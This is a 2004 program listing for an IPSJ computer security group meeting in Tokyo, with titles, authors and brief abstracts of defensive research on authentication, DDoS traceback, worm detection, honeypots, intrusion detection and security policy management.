27th CSEC Group Meeting

December 20, 2004

Information Processing Society of Japan (IPSJ)
Kagaku-kaikan (Chemistry Hall), 1-5 Kanda-Surugadai, Chiyoda-ku, Tokyo 101-0062 JAPAN


27th CSEC Group Meeting Program
(1) The proposal of the safe VPN construction technology based on device authentication
Tomoyuki Hoshikawa (NTT DATA CORPORATION)
Hirohisa Kamanaka (NTT DATA CORPORATION)

Today, various examinations are advanced about the technology which improves network security on the Internet. In order to perform safe information circulation, it not only authenticates those who use, but it is necessary to authenticates device. Especially, when advanced security is required, the method using the Tampa-proof nature and authentication technology of IC chip can be considered. VPN (Virtual Private Network) is used as a method of safe information circulation on the Internet. In this paper, by performing cooperation with device and IC chip, and device authentication using environment information further, the model which realizes construction of safe VPN is proposed and the validity is verified.

(2) A Proposal of Authentication Method Using Attribute Certificate
Yoshio KAKIZAKI (Tokai University)
Hidekazu TSUJI (Tokai University)

In the net society, there is an anonymity by non-face-to-face. The authentication is important in the net society. However, in many service, if whether you are a regular user and what authority you have can be confirmed, a strict authentication is not necessary. Our proposal method achieves privacy protected authority exercise to the service server by using attribute certificate on PKI.

(3) Implementation of a Fair Exchange Protocol on Smartcards
Kensaku Mori (Network Management Development Dept., NTT DoCoMo, Inc.)
Masayuki Terada (Network Management Development Dept., NTT DoCoMo, Inc.)
Kazuhiko Ishii (Network Management Development Dept., NTT DoCoMo, Inc.)
Sadayuki Hongo ()

This paper reports the result of our implementation of the fair exchange protocol for electronic rights on smartcards. In this implementation, we adopted TENeT, a framework which enables smartcards to directly communicate one another, to simplify the interface between smartcard and application programs. Our implementation built on current smartcards can exchange electronic rights in less than 1.8sec, which is practically sufficient for electronic rights trading markets.

(4) Note on Proof of the Validity of ballots Using Statistic property
Shingo Arinaga
Hiroshi Doi
Tsujii Shigeo

In electronic voting schemes with homomorphic property, voters prove that their ballots are encryptions of correct messages. The cost for constructing the proof is in proportion to the number of candidates which the voter casts. However, when we consider electronic questionnaires with many candidates, the cost for constructing the proof requires hard task for voters. In this paper, we propose a new efficient protocol to prove the validity of ballots, which reduces the cost for the voter by using statistic property.

(5) An Implementation of Anonymous Database for High Performance
Seigo Ito (Iwate Prefectural University)
Eiji Sugino (Iwate Prefectural University)
Yoshihiko Abe (Iwate Prefectural University)

(6) Efficient Traceback Method for Detecting DDoS Attacks
Toshifumi KAI (Matsusita Electric Works, Ltd. Systems Technology Research Laboratory)
Hiroshige NAKATANI (Matsusita Electric Works, Ltd. Systems Technology Research Laboratory)
Hiroshi SHIMIZU (Matsusita Electric Works, Ltd. Systems Technology Research Laboratory NTT Advanced Technology Corp, Core Networks Bussiness Headquarters System Development Unit)
Ayako SUZUKI (Kogakuin University Dept. of Computer Engineering)
Katsuji TSUKAMOTO ()

The amount of damage by illegal access is increasing with the spread of the Internet. Especially the DoS (Denial of Service) and DDoS (Distributed DoS) attacks cause system down and often have serious impacts on the society. Various attacker detection techniques have been proposed until now, of which characteristics in performance and easiness of implementation are discussed in this paper. Based on the discussion, we propose hybrid traceback method that solves the drawbacks of the exiting techniques. Advantages of this proposed scheme to the exiting ones are clarified by some numerical models and experiment.

(7) Reliability Feature Analysis for IP Traceback Systems
Keisuke OHMORI
Toshifumi KAI

IP traceback is a technique that searches DDoS attackers. There are many kinds of IP traceback methods. In a practical use of IP traceback systems, reliability of the systems is very important. In this paper, we analyze reliability features of typical IP traceback methods, which are ICMP, marking, and an UDP method newly proposed. False negative rate and False positive rate are evaluation parameters of the reliability. First we analyze mathematical models. Then we compare the analysis with measured values using the real large network for verification.

(8) Detection of Mass Mailing Worm-infected PC terminals by Observing DNS Query Access,
Yasuo Musashi (Center for Multimedia and Information, Kumamoto University)
Kai Rannenberg (Mobile Commerce & Multilateral Security, Goethe University Frankfurt)

We have developed a new detection system of IP addresses of the mass mailing worm (MMW)-infected PC terminals by only watching the domain name system (DNS) query access between the DNS server and the PC terminals.

(9) A Diffusion Model of Computer Worms Using Agent-based Approach
Masayuki ISHINISHI (Air Communications and Systems Wing, JASDF)
Hideki TANUMA (The Institute of Medical Science, The University of Tokyo)
Hiroshi DEGUCHI (Interdisciplinary Graduate School of Science and Engineering, Tokyo Institute of Technology)

An increase of computer worms in recent years caused big damage on the network in public offices and enterprises. So the damage influences at the life of the people and becomes serious problems. The authors aim to clarify diffusion phenomena by the simulation so as to obtain anti-virus policies. This paper proposes the diffusion model of computer worms using agent-based approach. The authors employ the SOARS language which is a spot-oriented model and compare it with the conventional method.

(10) The Relationship Between Virus Spread Process and The Infected Number of Countries
KANBA KOIZUMI (Graduate School of Media and Governance, Keio University)
HIDEKI KOIKE (Graduate School of Information Systems, University of Electro-Communications)
MICHIAKI YASUMURA (Faculty of Environmental Information, Keio University)

In this paper, we analysis the relationship betweeen viruses spread process and infected number of countries. We investigates the dynamism of geographical spread of viruses by target selection mechanism. We also investigates the effect of new scan method, named hub list scan.

(11) A Proposal and Development of Honeypot with Command Wrapper for Activity Restricted
KANBA KOIZUMI (Graduate School of Media and Governance, Keio University)
HIDEKI KOIKE (Graduate School of Information Systems, University of Electro-Communications)
MICHIAKI YASUMURA (Faculty of Environmental Information, Keio University)

In this paper, we propose and develop the honeypot with the activity restricted. Proposal system is for the purpose of intruder monitoring and consist of command wrapper. Command wrapper has data capture and data control ability. It's basically output dummy message and dummy prompt that pretend UNIX like OS. We explain the detail of our system, and knowledge by monitoring intruders.

(12) A Realization Method of Alert Base Signatures in Network Intrusion Detection Systems
Mitsuaki Tanabe (Graduate School of Engineering, Soka University)
Yoshimi Teshigawara (Graduate School of Engineering, Soka University)

Recently, according to incident reports of JPSERT/CC, IPA, and so on, it can be said that the damage by such as unauthorized accesses is increasing. Therefore, the number of organizations which introduce security products such as firewalls, anti-virus software and intrusion detection systems is increasing. However, it becomes a serious problem that intrusion detection system products induce incorrect detections. In this research, focusing on the false positive among incorrect detections, we propose a realization method which creates alert base signatures to decrease false positive.

(13) A Performance-tuning Method in Intrusion Detection using Bayesian Networks
Tsunemasa Hayashi
Stephanie Fung
Ryosuke Kurebayashi
Kiyoshi Kobayashi
Satoru Ohta

We construct an anomaly-based Intrusion Detection System (IDS) using Bayesian networks to protect a computer network (or host device) from malicious traffic. This type of IDS is capable of detecting new variants of attacks. In this paper, we propose a performance-tuning method to reduce the size of Bayesian networks, and show that our method can reduce the calculation costs without degrading performance. We then propose an IDS structure to achieve high speed operation.

(14) Unified Log Management and Abnormal Log Detection System

In recent years, illegal accesses in computer networks have been increasing, and use of equipments like a firewall became general. But these equipments may not block illegal accesses perfectly. So we have to repeat an investigation and countermeasure. But only engineers who have an advanced technology can implement such investigation and a measure. It is difficult to even conduct efficient and effective investigation, because incidents occur in many nodes in large-scale environments especially. Then, we aim for management and analysis of logs. In order to carry these out efficiently, we are studying and developing the unified log management system.

(15) Data Separation for Distributed Strorage System Considering loss of segments
Hitoshi HIRANO (Dept. of Computer Science, National Defense Academy)
Yasuhiro NAKAMURA (Dept. of Computer Science, National Defense Academy)

Distributed Storage System is proposed as a one of network file sharing system for small peer to peer network environment [3]. The method divides a target file into small segments, add some header information to each segment and distribute them to the network. However, the some problem remains that system cannot restore the shared file when some segments in cooperative node were lost for some reason. So it is subject to make data segments using redundancy code. This paper proposes an additional scheme that enables high performance distribution with user oriented coding control. This method improve the durability of distributed Storage System with flexible coding control, and as results, implementation of Distributed Storage System with fault tolerance and publicity control will be achieved independent of other network storages.

(16) A Policy Description Language for Policy-based Security Management
Sumitaka OKAJO (Internet Systems Research Laboratories, NEC Corp.)
Katsushi MATSUDA (Internet Systems Research Laboratories, NEC Corp.)
Ryuichi OGAWA (Internet Systems Research Laboratories, NEC Corp.)

In order to protect networks against network security threats, many security components with various security functions have been deployed, and the configuration and management of those components are highly complex. Therefore, we need a security policy management system to reduce system administrator's load. This paper presents a common security policy language, SCCML(Security Configuration Coordinator Markup Language), which can express various configuration of security components. SCCML has three features; (1)to express both access control and monitoring policies, (2)to express multiple security functions in a policy and (3)to express detailed of a specific device.

(17) Grasping the Security Management Situation by Functional Mapping
Katsushi MATSUDA (Internet System Research Laboratories, NEC)
Sumitaka OKAJO (Internet System Research Laboratories, NEC)
Ryuichi OGAWA (Internet System Research Laboratories, NEC)

There is a great expressive difference between a security policy and actual security parameters in security management, and consequently, policy-based security management might be difficult to accomplish. In this paper, we propose a new security policy description method that is easy and consistent, and also describe a functional mapping technique that matches a fragment of security policy with a software or hardware node in a network system. The description helps security administrators to draw up security policies without omissions. Also functional mapping helps them to grasp their security management situation and to discover some inadequate pieces of policy or nodes in the network system from the mapped situation.


Valid HTML 4.01! Valid CSS!